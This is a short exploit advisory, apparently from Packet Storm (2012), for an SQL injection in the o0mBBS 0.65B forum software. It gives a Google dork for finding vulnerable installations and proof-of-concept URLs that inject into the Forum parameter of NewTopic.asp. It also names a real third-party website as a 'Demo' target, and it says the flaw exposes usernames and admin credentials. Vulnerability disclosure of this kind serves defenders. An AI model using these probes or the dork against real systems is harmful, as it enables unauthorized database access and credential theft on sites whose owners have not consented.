o0mBBS 0.65B SQL Injection

2012-06-12T00:00:00
ID PACKETSTORM:113548
Type packetstorm
Reporter L3b-r1'z
Modified 2012-06-12T00:00:00

Description

                                        
`# --------------------------------------- #  
Author : L3b-r1'z  
Title : o0mBBS SQL Injection  
Date : 6/12/2012  
Email : L3br1z@Gmail.com  
Site : Sec4Ever.com & Exploit4arab.com  
Google Dork : allintext: "o0mBBS version 0.65B"  
Version : 0.65  
# --------------------------------------- #  
1) Bug  
2) PoC  
# --------------------------------------- #  
1) Bug :  
An attacker can inject SQL into the database and steal the username and admin.  
# --------------------------------------- #  
2) PoC :  
  
http://localhost/o0m/NewTopic.asp?Type=NewTopic&Forum=[SQL]  
http://localhost/o0m/NewTopic.asp?Type=NewTopic&Forum=2'  
  
Demo :  
  
http://www.oasitech.it/o0m/NewTopic.asp?Type=NewTopic&Forum=2%27  
# --------------------------------------- #  
Thx To : I-Hmx , B0X , Hacker-1420 , Damane2011 , Sec4ever , The Injector ,  
Over-X , Ked-Ans , N4SS1M , B07 M4ST3R , Black-ID , Abu Hamid Madridi.  
# --------------------------------------- #  
`